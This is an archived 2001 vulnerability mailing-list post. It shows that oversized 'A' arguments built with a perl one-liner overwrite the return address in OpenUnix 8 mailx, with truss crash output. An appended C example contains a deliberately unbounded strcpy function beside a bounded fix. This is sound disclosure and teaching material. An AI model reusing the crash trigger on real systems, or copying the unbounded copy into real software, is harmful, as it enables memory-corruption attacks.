Vulnerability Development mailing list archives

OpenUnix8 mailx command line overflow


From: dotslash () snosoft com
Date: Sun, 21 Oct 2001 12:52:10 -0700



/bin/mail is a symlink to mailx. mailx is not suid; however, it suffers
from a common buffer overflow.
-KF

# truss mail `perl -e 'print "A" x 5122'`
execve("/bin/mail", 0x08045F18, 0x08045F24)  argc = 2
open("//.mailrc", O_RDONLY, 0666)               Err#2  ENOENT
     Incurred fault #6, FLTBOUNDS  %pc = 0x202C4141
       siginfo: SIGSEGV SEGV_MAPERR addr=0x202C4141
     Received signal #11, SIGSEGV [default]
       siginfo: SIGSEGV SEGV_MAPERR addr=0x202C4141
         *** process killed ***

# truss mail `perl -e 'print "A" x 5124'`
     Incurred fault #6, FLTBOUNDS  %pc = 0x41414141
       siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
     Received signal #11, SIGSEGV [default]
       siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
         *** process killed ***

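The truss output above is the signature of an unbounded copy of a command-line argument into a fixed-size stack buffer: at 5122 bytes the fault address is only partly made of 'A' bytes, and two bytes later %pc is fully 0x41414141, the saved return address overwritten. The following C program is an added illustration of that bug class and its bounded replacement; it is not mailx's source, and the buffer size ADDR_MAX, the function names and the recipient string are assumptions chosen for the example.

```c
/* Added illustration, not mailx's code: the argv-to-fixed-buffer overflow
   pattern next to a bounded version that rejects oversized arguments. */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>

#define ADDR_MAX 256   /* hypothetical size of the recipient buffer */

/* Unsafe pattern: copies the argument into a fixed stack buffer with no
   length check. For strlen(arg) >= ADDR_MAX the copy runs past the buffer
   and, as the truss output shows for mailx, eventually overwrites the saved
   return address. Kept only for contrast; nothing below calls it. */
void unsafe_take_address(const char *arg)
{
    char addr[ADDR_MAX];
    strcpy(addr, arg);          /* no bound on the copy */
    printf("mailing to %s\n", addr);
}

/* Bounded version: never reads more than dstlen bytes of arg, refuses
   anything that does not fit together with its NUL, and always leaves dst
   terminated. Returns 0 on success, -1 with errno = E2BIG if too long. */
int safe_take_address(const char *arg, char *dst, size_t dstlen)
{
    size_t n;
    if (arg == NULL || dst == NULL || dstlen == 0)
        return -1;
    n = strnlen(arg, dstlen);   /* stops at dstlen even without a NUL */
    if (n >= dstlen) {          /* n == dstlen: no room for the terminator */
        errno = E2BIG;
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, arg, n + 1);    /* n + 1 copies the terminating NUL too */
    return 0;
}

/* Mirrors the command line from the post: 1 if the argument fits the
   fixed buffer and is accepted, 0 if it is rejected. */
int accept_recipient(const char *arg)
{
    char addr[ADDR_MAX];
    return safe_take_address(arg, addr, sizeof addr) == 0;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s recipient\n", argv[0]);
        return 2;
    }
    if (!accept_recipient(argv[1])) {
        fprintf(stderr, "recipient too long (max %d bytes)\n", ADDR_MAX - 1);
        return 1;
    }
    printf("recipient accepted\n");
    return 0;
}
```

Run with a 5124-byte argument, as in the post, and the bounded version exits with an error instead of faulting; the check is the length comparison against the destination size, not the choice of copy routine.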

